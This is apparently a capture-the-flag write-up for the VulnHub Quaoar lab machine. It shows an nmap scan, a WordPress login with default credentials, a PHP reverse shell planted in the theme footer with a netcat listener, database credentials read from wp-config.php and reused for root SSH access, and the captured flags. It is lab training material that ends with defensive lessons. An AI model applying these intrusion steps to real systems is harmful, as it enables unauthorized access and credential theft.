Intro
- Difficulty Level: Very Easy
- Link: VulnHub
Description
The Quaoar vulnerable machine was created for the Hackfest 2016 CTF. It’s a Boot2Root type (Starting at the Boot and get to the superuser “root”)
Initial Analysis
The goal is set at three flags on the machine:
- Get a shell
- Get root access
- Optional: post exploration flag
Starting up the VM in VirtualBox the machine exposes it’s IP.
Step by Step
Step 1: nmap recon
Let’s start with the standard recon nmap scan:
n41lit@n41lit:~$ nmap -sV -O -A 192.168.1.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-29 09:58 EST
Nmap scan report for 192.168.1.101
Host is up (0.0010s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
<SNIP>
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.85 ms 192.168.1.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.66 seconds
On the scan we can see Port 80 is open. Let’s use a Web-Browser to see if we can get started out.
Step 2: Web Recon and Compromise of the Admin Interface
http://<IP_ADDR>:80 in the Webbrowser opens this Webpage:
It states
Click here to know what you need to know
After a click on that notice, we get directed to the Hack_The_Planet.jpg image:
So lets continue with checking the robots.txt if there are any hints.
Indeed, lets see whats behind /wordpress/:
It’s a Wordpress site. When we scroll down we can see a Log In field.
Let’s try some default stuff.
Bullseye, admin:admin works!
Step 3: Reverse shell
We can leverage a reverse shell script from pentestmonkey [src] to gain access.
The script needs to go into Apperance > Editor > footer.php
Change the IP in the script, load the Page again and start a netcat listener to get a shell:
n41lit@n41lit:~$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.1.201] from (UNKNOWN) [192.168.1.101] 32835
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
12:15:23 up 4:56, 0 users, load average: 0.34, 0.22, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Step 4: Finding the first flag
After we get a shell, lets look around for the first flag
$ cd home
$ ls
wpadmin
$ cd wpadmin
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e
Hey there. From reading the /home/wpadmin/flag.txt file we get our first flag: 2bafe61f03117ac66a73c3c514de796e
Step 5: Finding the second flag
Lets search for some config files, afterall the Web login was not protected that good.
$ locate config
<SNIP>
/var/www/upload/config.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/.htaccess
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/config.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/config_sik.php
/var/www/upload/modules/tiny_mce_4/tiny_mce/filemanager/config/index.php
/var/www/wordpress/wp-config-sample.php
/var/www/wordpress/wp-config.php
/var/www/wordpress/wp-admin/setup-config.php
/var/www/wordpress/wp-content/plugins/akismet/views/config.php
We can look into /var/www/wordpress/wp-config.php
$ cat /var/www/wordpress/wp-config.php
<?php
<SNIP>
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
<SNIP>
Look, they used the root user in the config.
Remember, they had an open port 22. After all we can probably just SSH as root?
kali@kali:~$ ssh root@192.168.1.101
<SNIP>
root@192.168.1.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed Jan 29 12:25:03 EST 2025
System load: 0.17 Processes: 97
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 56% IP address for eth0: 192.168.1.101
Swap usage: 0% IP address for virbr0: 192.168.122.1
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#
Shurely we can!
The flag we get very easily:
root@Quaoar:~# ls
flag.txt vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
Step 6: Post exploration flag
I didn’t bother to get the post exploration flag, since we are already root. But you can try for shure!
Conclusion
Summary
The attack began with an Nmap scan, which revealed multiple open ports, including HTTP (80) and SSH (22). A WordPress site was discovered at /wordpress/, with an easily guessable admin login (admin:admin). Using a PHP reverse shell, an initial foothold was gained. The first flag was found in /home/wpadmin/flag.txt. Further investigation revealed database credentials in wp-config.php, which allowed direct SSH access as root, leading to the second flag.
Lessions learned
- Avoid weak credentials - admin:admin isn’t that strong
- Restrict access to sensitive files - wp-config.php
- Protect and monitor open services - Logging in with root credentials was trivial